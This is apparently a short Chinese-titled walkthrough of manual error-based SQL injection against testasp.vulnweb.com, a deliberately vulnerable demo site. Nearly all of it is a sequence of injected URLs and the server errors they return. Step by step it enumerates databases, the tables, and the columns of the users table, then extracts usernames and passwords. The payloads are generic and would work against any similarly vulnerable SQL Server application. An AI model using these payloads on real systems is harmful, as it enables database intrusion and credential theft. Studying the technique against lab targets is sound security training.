sql server手工注入





http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

返回Conversion failed when converting the nvarchar value 'acublog' to data type int


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

返回Conversion failed when converting the nvarchar value 'acuforum' to data type int

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.



http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

返回Conversion failed when converting the nvarchar value 'threads' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

返回Conversion failed when converting the nvarchar value 'users' to data type int

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

返回Conversion failed when converting the nvarchar value 'forums' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

返回Conversion failed when converting the nvarchar value 'posts' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

返回Conversion failed when converting the nvarchar value 'uname' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

返回Conversion failed when converting the nvarchar value 'upass' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

返回Conversion failed when converting the nvarchar value 'email' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

返回Conversion failed when converting the nvarchar value 'realname' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

返回Conversion failed when converting the nvarchar value 'avatar' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

返回Conversion failed when converting the nvarchar value '--' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

返回Conversion failed when converting the nvarchar value 'none' to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)


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